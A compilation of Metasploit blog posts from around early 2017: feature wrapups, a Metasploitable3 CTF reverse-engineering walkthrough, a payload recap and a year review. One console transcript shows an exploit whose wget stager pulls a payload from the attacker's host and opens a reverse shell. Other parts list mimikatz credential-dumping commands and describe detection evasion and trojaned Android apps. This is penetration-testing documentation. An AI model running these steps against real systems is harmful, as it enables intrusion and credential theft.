
Weekly Metasploit Wrapup

Posted by egypt Employee Jan 27, 2017

Welcome back to the Metasploit Weekly Wrapup! It's been a while since the last one, so quite a bit has happened in that time including 75 Pull Requests.

 

Stageless mettle

The rewrite of meterpreter for POSIX systems, mettle, now supports a stageless mode. You can now build standalone static executables for almost a dozen architectures and run them on everything from small home routers to cell phones to servers and mainframes. It can also take its configuration from the command line, so you don't even need a different executable for different handler locations.

 

UDP pivoting

The new mettle supports pivoting just like Windows meterpreter, and both have had some improvements for forwarding UDP packets in this update. This is particularly useful with auxiliary/scanner/discovery/udp_sweep, which tries a bunch of different protocol probes on a range of ports to quickly identify UDP services.

 

Android

Using APK injection to trojan an existing Android app is a cool trick for social engineering folks into installing your backdoor, and it can get you a lot of info from a phone. One downside is that Android's privilege separation system prevents you from reading the data owned by other apps, so there are some things you might want to steal that you won't have access to. That's where Local Privilege Escalation exploits become essential. This week's update includes a new LPE for a relatively old vulnerability, the put_user bug which was exploited in the wild in 2013, as well as updates to the towelroot exploit allowing it to target more devices.

 

This week's update adds CSV and vCard output formats to Android Meterpreter's dump_contacts command. This means you can now dump an Android device's contact list in an importable format.

 

Ever find yourself in a situation where you can't back up your phone contacts normally? Meterpreter to the rescue! If you can shell your phone - which you should be able to if it's yours - the `dump_contacts` command now gives you the option of a normal text file, CSV, or vCard for the output format.

 

Here's how to use it:

 

meterpreter > dump_contacts -h
Usage: dump_contacts [options]
Get contacts list.

OPTIONS:

    -f   Output format for contacts list (text, csv, vcard)
    -h        Help Banner
    -o   Output path for contacts list


meterpreter > dump_contacts -f csv
[*] Fetching 4 contacts into list
[*] Contacts list saved to: contacts_dump_20170121174248.csv
meterpreter > dump_contacts -f vcard
[*] Fetching 4 contacts into list
[*] Contacts list saved to: contacts_dump_20170121174258.vcf

 

 

wget/curl command stagers

 

 

If you're familiar with command injections, you know that downloading a payload from a remote host and then executing it can be more efficient than writing the payload to the target incrementally.

 

This update brings wget(1) and curl(1) command stagers (CmdStager) to Metasploit in environments that need it most (read: embedded). With the option of HTTP or HTTPS, a small embedded device can now fetch payloads over either protocol.

 

To use the new command stagers in your module, you can set flavor: wget or flavor: curl in your execute_cmdstager call, or you can set the flavor in CmdStagerFlavor in your info hash. Lastly, if you're already running the module, you can change the flavor with CMDSTAGER::FLAVOR, but that'll work only if the module doesn't define a required flavor.

 

Here's an example of setting CMDSTAGER::FLAVOR:

 

msf > use exploit/linux/http/apache_continuum_cmd_exec 
msf exploit(apache_continuum_cmd_exec) > set rhost 192.168.33.129
rhost => 192.168.33.129
msf exploit(apache_continuum_cmd_exec) > set payload linux/x64/mettle_reverse_tcp 
payload => linux/x64/mettle_reverse_tcp
msf exploit(apache_continuum_cmd_exec) > set cmdstager::flavor wget 
cmdstager::flavor => wget
msf exploit(apache_continuum_cmd_exec) > set lhost 192.168.33.1 
lhost => 192.168.33.1
msf exploit(apache_continuum_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] Injecting CmdStager payload...
[*] Using URL: http://0.0.0.0:8080/XlM6PUw74P
[*] Local IP: http://192.168.1.3:8080/XlM6PUw74P
[*] Meterpreter session 1 opened (192.168.33.1:4444 -> 192.168.33.129:55171) at 2017-01-27 13:27:54 -0600
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.
meterpreter > 

 

Notice how small the command stager is. If we were to write the payload out with echo(1) or printf(1) or somesuch, we'd be sending the payload as hex strings... which will take a while to write to disk.

 

 

History command

Metasploit stores your msfconsole history in ~/.msf4/history, but sometimes you only want to dump out pieces of it. The new history command works similarly to the bash command of the same name, letting you do just that.

 

workspace -v

The workspace command now takes a verbose flag to dump out some statistics about the stuff you've collected in each workspace. It shows the number of hosts, vulns, creds, loots, and notes.

 

11:52:25 192.168.99.1 nasa j:0 s:0 exploit(psexec) > workspace
   default
   fbi
  * nasa
   wh.gov
11:52:45 192.168.99.1 nasa j:0 s:0 exploit(psexec) > workspace  -v
  Workspaces
  ==========
  current  name     hosts  services  vulns  creds  loots  notes
  -------  ----     -----  --------  -----  -----  -----  -----
           default  5      2         3      3      0      8
           fbi      98     165       49     155    301    72
  *        nasa     32     81        41     14     33     20
           wh.gov   1      9         0      0      0      0

11:52:45 192.168.99.1 nasa j:0 s:0 exploit(psexec) >

 

 

to_handler command

Complementing the handler command is another new command, to_handler, that does the same thing, but takes its settings from the context of the currently-selected payload module. At some point it is likely that these two things will be unified, but for now it's pretty useful as is.

 

12:07:10 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > options
  Module options (payload/windows/meterpreter/reverse_https):
     Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    LHOST                      yes       The local listener hostname
    LPORT     8443             yes       The local listener port
    LURI                       no        The HTTP Path
12:07:11 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > set LHOST 192.168.99.1
LHOST => 192.168.99.1
12:07:27 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > 
12:07:29 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > set LPORT 8888
LPORT => 8888
12:07:39 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > to_handler
[*] Payload Handler Started as Job 2
[*] Started HTTPS reverse handler on https://0.0.0.0:8888
[*] Starting the payload handler...
12:07:41 192.168.99.1 nasa j:1 s:0 payload(reverse_https) > jobs -v
  Jobs
  ====
   Id  Name                    Payload                            Payload opts               URIPATH  Start Time                 Handler opts
   --  ----                    -------                            ------------               -------  ----------                 ------------
   2   Exploit: multi/handler  windows/meterpreter/reverse_https  https://192.168.99.1:8888           2017-01-27 12:07:40 -0600  https://0.0.0.0:8888

 

Revamped kiwi

Meterpreter now has a revamped kiwi extension, replacing the old system of specific TLVs with a much simpler interface to the mimikatz command system. What that means for developers is a lot fewer moving parts between the two codebases and easier, streamlined updates. What that means for users is getting the latest and greatest mimikatz in Meterpreter a lot sooner.

 

This brings kiwi up to mimikatz version 2.1, and now works on Windows XP SP3 and Windows 2003 SP1 all the way up to 10 and 2016. In particular the new dcsync command is fabulous for stealing hashes from a domain controller. This grabs info from the DC's user database so, just like when parsing NTDS.dit, it gets historical hashes as well as the one currently in use for the given user.

 

As before, the kiwi client extension has commands for most of the things you want to get out of mimikatz:

Kiwi Commands
=============

    Command                Description
    -------                -----------

    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    wifi_list              List wifi profiles/creds

 

If that doesn't cover what you need, you can also send commands directly to the underlying mimikatz shell, so you can access everything that we don't have a direct wrapper for.

 

And then you run the most important command that mimikatz offers:

meterpreter > kiwi_cmd coffee

    ( (
     ) )
  .______.
  |      |]
  \      /
   `----'

New Modules

Exploit modules (6 new)

Auxiliary and post modules (4 new)

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploitable3 is a free virtual machine that we have recently created to allow people to simulate attacks using Metasploit. In it, we have planted multiple flags throughout the whole system; they are basically collectable poker card images of some of the Rapid7/Metasploit developers. Some are straight-forward and easy to open, some are hidden, or obfuscated, etc. Today, we would like to share the secret to unlocking one of these cards: the King of Clubs.

 

The King of Clubs is one of the fun flags to extract. This card can be found in the C:\Windows\System32 directory, and it's an executable. To retrieve it, you will need to compromise the host first. In this demonstration, we will SSH into the host. And when calling the King of Clubs executable, we are greeted with the following riddle:

 

[screenshot: the riddle printed by the King of Clubs executable]

 

Binary Analysis

 

Obviously, this executable requires a closer examination. So ideally, you want to download this binary somewhere to your favorite development/reversing environment:

 

[screenshot: downloading the binary]

 

If you attempt to look at the executable with a debugger, you will notice that the binary is packed, which makes it difficult to read. There are multiple ways to figure out what packer was used for the executable. You will most likely discover it by inspecting the PE structure, which contains multiple UPX sections, or you can use PEiD to tell you:

 

[screenshot: PEiD identifying UPX]

 

UPX is a binary compression tool that is commonly used by malware to make reverse engineering a little bit more difficult. It is so common that you can find an unpacker pretty easily, as well. In this example, we are using PE Explorer because it's free. PE Explorer will automatically recognize that our binary is packed with UPX, and unpack it. So all you have to do is open the binary with it and click save:

 

[screenshot: PE Explorer unpacking the UPX binary]

 

There, that wasn't too painful. Was it?

 

At this point, we are ready to read the binary with a disassembler. Let's start with the main function:

 

[screenshot: disassembly of the main function]

 

As we can see, the first thing the program does is check whether a debugger is attached. If there is, the program exits:

 

[screenshot: the IsDebuggerPresent check]

 

If you are doing dynamic analysis, don't forget to disable this :-)

 

The next thing it does is check whether the current user is "hdmoore". If so, it writes a card to disk. If not, it prints out the riddle that we saw previously:

 

[screenshot: the username comparison]

 

Let's look at how the card is created in a little more detail. First off, we see that the constructor of the Card class initializes something with the value 0x0f; this piece of information is important for later:

 

[screenshot: the Card class constructor]

 

After the initialization, our main function calls the writeCard function.

 

The writeCard function does two things. First, it iterates through a big chunk of data of 76473h bytes, XORing each byte. If you pay attention to where EAX comes from, which is [EBP+ARG_0], you should recognize that it's the value the Card class initialized. So this means the writeCard function is XORing a big chunk of data with 0x0F:

 

[screenshot: the XOR loop in writeCard]

 

After the function is done XORing, it's ready to write the data to disk using ofstream. The first argument of ofstream's open function reveals that we are trying to write a file named "king_of_clubs.png":

 

[screenshot: the ofstream open call with "king_of_clubs.png"]

 

After the file is written, we are at the end of the function, and that leads us to the end of the program.

 

Ways to Extraction

 

Now that we understand how the program works, we have some options to extract the XOR'd image from the binary:

 

  • Since IDA already tells us where the XOR'd PNG data is, we can extract 76474h bytes, and then XOR the data back with 0x0f.
  • Bypass the IsDebuggerPresent call with OllyDBG, and modify the JNZ jump after strcmp, which will force the program to always produce the card.
  • This is probably the easiest one: create a user named "hdmoore" and run the program again:
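The first option, carried out in code as an added example (this is not part of the original post or of the Metasploitable3 project): rather than trusting a fixed offset and size, the script searches the unpacked binary for the PNG signature XOR'd with 0x0F, walks the chunk structure to the IEND chunk so the end of the image is found exactly, decodes it and checks every chunk CRC. The "binary" it runs on is a constructed stand-in (filler bytes around a tiny XOR'd PNG), not the real king executable.

```python
import struct
import zlib
from typing import Optional

PNG_SIG = b"\x89PNG\r\n\x1a\n"
XOR_KEY = 0x0F  # the constant the Card constructor stores, per the write-up


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (what the writeCard loop does)."""
    return bytes(b ^ key for b in data)


def png_chunk(ctype: bytes, payload: bytes) -> bytes:
    """Build one PNG chunk: big-endian length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_sample_png() -> bytes:
    """Constructed stand-in for the real card image: a valid 1x1 red RGB PNG."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")            # filter 0 + one pixel
    return PNG_SIG + png_chunk(b"IHDR", ihdr) + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b"")


def verify_png(png: bytes) -> bool:
    """Check the signature and every chunk CRC; True only if IEND is reached cleanly."""
    if not png.startswith(PNG_SIG):
        return False
    pos = len(PNG_SIG)
    while pos + 12 <= len(png):
        length = struct.unpack(">I", png[pos:pos + 4])[0]
        ctype = png[pos + 4:pos + 8]
        payload = png[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])[0]
        if len(payload) != length or zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            return False
        pos += 12 + length
        if ctype == b"IEND":
            return True
    return False


def carve_xored_png(blob: bytes, key: int = XOR_KEY) -> Optional[bytes]:
    """Find a PNG stored XOR'd with `key` inside `blob` and return it decoded.

    Chunk headers are decoded one at a time so the image boundary comes from
    the PNG structure itself, not from a size read off the disassembly.
    """
    start = blob.find(xor_bytes(PNG_SIG, key))
    if start < 0:
        return None
    pos = start + len(PNG_SIG)
    while pos + 12 <= len(blob):
        header = xor_bytes(blob[pos:pos + 8], key)
        length = struct.unpack(">I", header[:4])[0]
        ctype = header[4:]
        end = pos + 12 + length
        if end > len(blob):
            return None  # truncated chunk: the data does not hold a whole image
        pos = end
        if ctype == b"IEND":
            png = xor_bytes(blob[start:end], key)
            return png if verify_png(png) else None
    return None


def demo() -> Optional[bytes]:
    """Constructed 'unpacked binary': filler, the XOR'd card, more filler."""
    filler = bytes(range(256)) * 4  # constructed padding, not real code bytes
    blob = filler + xor_bytes(build_sample_png(), XOR_KEY) + filler
    return carve_xored_png(blob)


if __name__ == "__main__":
    recovered = demo()
    print("recovered valid PNG:", recovered is not None and verify_png(recovered))
```

On the real unpacked executable you would read the file into `blob` instead of calling `demo()` and write the returned bytes to king_of_clubs.png.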

 

[screenshot: running the program as user hdmoore]

 

And that's how you reverse engineer the challenge. Now, go ahead and give this a try, and see who the King of Clubs is. If you like this challenge, don't feel shy to try the other 14 Metasploitable3 flags as well :-)

 

If you haven't tried Metasploitable3 but finally want to get your hands dirty, you can get it here. Keep in mind that Metasploitable3 is a vulnerable image that's heavily exploitable by Metasploit, so if you don't have Metasploit, you should download that and put it in your tool box :-)

Merry HaXmas to you! Each year we mark the 12 Days of HaXmas with 12 blog posts on hacking-related topics and roundups from the year. This year, we’re highlighting some of the “gifts” we want to give back to the community. And while these gifts may not come wrapped with a bow, we hope you enjoy them.

 

Editor's Note: Yes, this is technically an extra post to celebrate the 12th day of HaXmas. We said we liked gifts!

 

Happy new year! It is once again time to reflect on Metasploit's new payload gifts of 2016 and to make some new resolutions. We had a lot of activity with Metasploit's payload development team, thanks to OJ Reeves, Spencer McIntyre, Tim Wright, Adam Cammack, danilbaz, and all of the other contributors. Here are some of the improvements that made their way into Meterpreter this year.

 

On the first day of Haxmas, OJ gave us an Obfuscated Protocol

 

Beginning the new year with a bang (and an ABI break), we added simple obfuscation to the underlying protocol that Meterpreter uses when communicating with Metasploit Framework. While it is just a simple XOR encoding scheme, it still stumped a number of detection tools, and still does today. In the game of detection cat-and-mouse, security vendors often like to pick on the open source project first, since there is practically no reverse engineering required. It is doubly surprising that this very simple technique continues to work today. Just be sure to hide that stager.

 

On the second day of Haxmas, Tim gave us two Android Services

 

Exploiting mobile devices is exciting, but a mobile session does not have the same level of always-on connectivity as a server session does. It is easy to lose your session because a phone went to sleep, there was a loss of network connectivity, or the payload was swapped out for some other process. While we can't do much about networking, we did take care of the process swapping by adding the ability for Android Meterpreter to automatically launch as a background service. This means that not only does it start automatically, it does not show up as a running task, and is able to run in a much more resilient and stealthy way.

On the third day of Haxmas, OJ gave us three Reverse Port Forwards

 

While exploits have been able to pivot server connections into a remote network through a session, Metasploit did not have the ability for a user to run a local tool and perform the same function. Now you can! Whether it's python responder or just a web server, you can now set up a local service that is visible to your target users via a Meterpreter session. This is a nice complement to the standard port forwarding that has been available with Meterpreter sessions for some time.

 

On the fourth day of Haxmas, Tim gave us four Festive Wallpapers

Sometimes, when on an engagement, you just want to know 'who did I own?'. Looking around, it is not always obvious, and popping up calc.exe isn't always visible from afar, especially with those new-fangled HiDPI displays. Now Metasploit lets you change the background image on OS X, Windows and Android desktops. You can now update everyone's desktop with a festive picture of your choosing.

 

On the fifth day of Haxmas, OJ gave us five Powershell Prompts

Powershell has been Microsoft's gift both to Administrators and Penetration Test/Red Teams. While it adds a powerful amount of capabilities, it is difficult to run powershell as a standalone process using powershell.exe within a Meterpreter session for a number of reasons: it sets up its own console handling, and can even be disabled or removed from a system.

 

This is where the Powershell Extension for Meterpreter comes in. It not only makes it possible to comfortably run powershell commands from Meterpreter directly, you can also interface directly with Meterpreter straight from powershell. It uses the capabilities built in to all modern Windows system libraries, so it even works if powershell.exe is missing from the system. Best of all, it never drops a file to disk. If you haven't checked it out already, make it your resolution to try out the Meterpreter powershell extension in 2017.

 

On the sixth day of Haxmas, Tim gave us six SQLite Queries

Mobile exploitation is fun for obtaining realtime data such as GPS coordinates, local WiFi access points, or even looking through the camera. But getting data from applications can be trickier. Many Android applications use SQLite for data storage, however, and armed with a local privilege escalation (of which there are now several for Android), you can now peruse local application data directly from within an Android session.

 

On the seventh day of Haxmas, danilbaz gave us seven Process Images

This one is for the security researchers and developers. Originally part of the Rekall forensic suite, winpmem allows you to automatically dump the memory image for a remote process directly back to your Metasploit console for local analysis. A bit more sophisticated than the memdump command that has shipped with Metasploit since the beginning of time, it works with many versions of Windows, does not require any files to be uploaded, and automatically takes care of any driver loading and setup. Hopefully we will also have OS X and Linux versions ready this coming year as well.

 

On the eighth day of Haxmas, Tim gave us eight Androids in Packages

The Android Meterpreter payload continues to get more full-featured and easy to use. Stageless support now means that Android Meterpreter can now run as a fully self-contained APK, and without the need for staging, you can now save scarce bandwidth in mobile environments. APK injection means you can now add Meterpreter as a payload on existing Android applications, even resigning them with the signature of the original publisher. It even auto-obfuscates itself with Proguard build support.

 

On the ninth day of Haxmas, zeroSteiner gave us nine Resilient Serpents

Python Meterpreter saw a lot of love this year. In addition to a number of general bugfixes, it is now much more resilient on OS X and Windows platforms. On Windows, it can now automatically identify the Windows version, whether from Cygwin or as a native application. From OS X, reliability is greatly improved by avoiding using some of the more fragile OS X python extensions that can cause the Python interpreter to crash.

 

On the tenth day of Haxmas, OJ gave us ten Universal Handlers

Have you ever been confused about what sort of listener you should use on an engagement? Not sure if you'll be using 64-bit or 32-bit Linux when you target your hosts? Fret no more, the new universal HTTP payload, aka multi/meterpreter/reverse_http(s), now allows you to just set it and forget it.

 

On the eleventh day of Haxmas, Adam and Brent gave us eleven Posix Payloads

Two years ago, I started working at Rapid7 as a payloads specialist, and wrote this post (https://community.rapid7.com/community/metasploit/blog/2015/01/05/maxing-meterpreters-mettle) outlining my goals for the year. Shortly after, I got distracted with a million other amazing Metasploit projects, but still kept the code on the back burner. This year, Adam, myself, and many others worked on the first release of Mettle, a new Posix Meterpreter with an emphasis on portability and performance. Got a SOHO router? Mettle fits. Got an IBM Mainframe? Mettle works there too! OSX, FreeBSD, OpenBSD? Well, it works there as well. Look forward to many more improvements in the Posix and embedded post-exploitation space, powered by the new Mettle payload.

 

On the twelfth day of Haxmas, OJ gave us twelve Scraped Credentials

Have you heard? Meterpreter now has the latest version of mimikatz integrated as part of the kiwi extension, which allows all sorts of credential-scraping goodness, supporting Windows XP through Server 2016. As a bonus, it still runs completely in memory for stealthy operation. It is now easier than ever to keep Meterpreter up-to-date with upstream thanks to some nice new hooking capabilities in Mimikatz itself. Much thanks to gentilkiwi and OJ for the Christmas present.

 

Hope your 2017 is bright and look forward to many more gifts this coming year from the Metasploit payloads team!


The Metasploitable3 CTF competition has wrapped up and we have our winners! We had almost 300 flag submissions from more than 50 fine folks. There were some really great write-ups submitted with great details on how flags were found. Thanks to everyone who took time to submit a finding! ON TO THE RESULTS!

 

When we announced the competition, we didn't specify whether team submissions were allowed or not. Well, it turns out that a team was in the top 3. Team RUNESEC went bonkers and submitted all 15 flags over the course of 4 days. Nice work RUNESEC. We didn't want anyone to feel slighted, so we decided to go ahead and (in the spirit of the season) be generous. Therefore, Team RUNESEC will receive a 2nd place prize as they were second to submit all the flags. Additionally, the top 3 individual submitters will receive prizes.

 

These winners showed some tremendous talent and skill. Vaibhav completed just 7 days after the contest was announced, and Jonathan completed all the flags in roughly 12 hours! A total of 4 individuals completed the challenge; based on reviews of the write-ups and time of completion, we have the top 3 winners.

 

Top Individual Submitters

1st Place, Hak5 Pineapple: Vaibhav Deshmukh

2nd Place, LAN Turtle or Lock Pick Set: Igor Guarisma

3rd Place, LAN Turtle or Lock Pick Set: Jonathan Echavarria

 

Top Team Submitter

1st Place, LAN Turtle or Lock Pick Set: Team RUNESEC

 

Here is a breakdown of the top 10 submitters; please note that the grouping by count doesn't reflect overall standings, just the number of valid flags submitted.

 

Top 10 Submitters

[image: top 10 submitters by number of valid flags]

 

Great work everyone!

 

The cards most frequently found were:

[image: cards by number of times found]

 

The card most likely to be found first?  The Joker.

 


We will be contacting the winners directly over the next few weeks to arrange delivery of the prizes. And... as an added bonus, EVERYONE who submitted a valid flag will get a Metasploit t-shirt!!

 

Thanks again to everyone who participated; we've had a great time reviewing all the very creative and well-written submissions. Going forward we will continue to add new and fun flags to Metasploitable3, and as always, we'll keep you posted when we have some new flags to discover. We will also be adding new options to exploit Metasploitable3 as they emerge. If you have any ideas or things you'd like to see in future iterations of Metasploitable3, please feel free to comment on our Git page. Metasploitable3 is an open source project so, if you're up to it, you can submit a pull request with any of your own ideas! Check out the repo on git.

 

I'd like to give a special thanks to sinn3r for all of his great work judging submissions and helping out everyone with questions.


 

Breaking Records and Breaking Business

2016 brought plenty of turmoil, and InfoSec was no exception:

  • Largest data breach: Largest breach ever, affecting more than 1 billion Yahoo users. And they were not alone: Oracle, LinkedIn, the Department of Justice, SnapChat, Verizon, DropBox, the IRS --- many organizations experienced, or discovered (or finally revealed the true extent of...), massive breaches this year.
  • Record-breaking denial of service attacks: law enforcement efforts targeting DDoS-as-a-Service providers are encouraging, but Mirai achieved record-breaking DDoS attacks this year. It turns out those easy-to-take-for-granted devices joining the Internet of Things in droves can pack quite a punch.
  • Ransomware: the end of 2015 saw a meteoric rise in the prevalence of ransomware, and this continued in 2016. Healthcare and other targeted industries have faced 2-4x as many related attacks this year, some via increased coverage of ransomware in exploit kits, but mostly through plain old phishing.

 

Businesses and individuals continue to face new and increasing threats in keeping their essential systems and data secure. A static defense will not suffice: they must increase in both awareness and capability regularly in order to form a robust security program.

 

Metasploit Framework has grown in many ways during 2016, both through the broader community and through Rapid7 support. Let's look back through some of the highlights:

 

More exploits

A surprisingly wide range of exploits were added to Metasploit Framework in 2016:

  • Network management: NetGear, OpenNMS, webNMS, Dell, and more
  • Monitoring and backup: Nagios XI, Exagrid
  • Security: ClamAV, TrendMicro, Panda, Hak5 Pineapple, Dell SonicWall, Symantec -- and Metasploit itself!
  • Mainframes, SCADA dashboards
  • Exploit Kits: Dark Comet, Phoenix
  • ExtraBACON; StageFright
  • Content management/web applications: Joomla, TikiWiki, Ruby on Rails, Drupal, Wordpress forms
  • Docker, Linux kernel, SugarCRM, Oracle test suite, Apache Struts, exim, Postgres, and many more!

 

More flexibility

Metasploit Framework provides many supporting tools, aside from those designed to get a session on a target. These help in collecting information from a wide variety of systems, staying resilient to unknown and changing network environments, and looking like you belong.

 

Some expansions to the toolbox in 2016 included:

 

By the Numbers

Nearly 400 people have contributed code to Metasploit Framework during its history. And speaking of history: Metasploit Framework turned 13 this year! Long long ago, in a console (probably not too) far away:

[screenshot: msfconsole banner from Metasploit Framework 2.2]

Metasploit Framework 2.2 - 30 exploits

 

Has much changed in the last 12 years? Indeed!

[screenshot: msfconsole banner from Metasploit Framework 4.13.8]

Metasploit Framework 4.13.8 - 1607 exploits

 

In 2016, Metasploit contributors added over 150 new modules. Metasploit Framework's growth is powered by Rapid7, and especially by the community of users that give back by helping the project in a variety of ways, from landing pull requests to finding flags.

 

Topping the list of code contributors in 2016: Wei Chen (sinn3r), Brent Cook, William Vu (wvu), Dave Maloney (thelightcosine), h00die, OJ Reeves, nixawk, James Lee (egypt), Jon Hart, Tim Wright, Brendan Watters, Adam Cammack, Pedro Ribeiro, Josh Hale (sn0wfa11), and Nate Caroe (TheNaterz).

 

The Metasploit Framework GitHub project is approaching 4700 forks, and ranks in the top 10 for Ruby projects once again. It's also the second most starred security project on GitHub. None of this would have been possible if not for the dedication and drive of the Metasploit community. Together, we can continue to highlight flaws in existing systems, and better test the essential software of tomorrow. John Locke voiced in 1693 what open source security supporters continue to know well today: "The only fence against the world is a thorough knowledge of it."

 

So what about you?
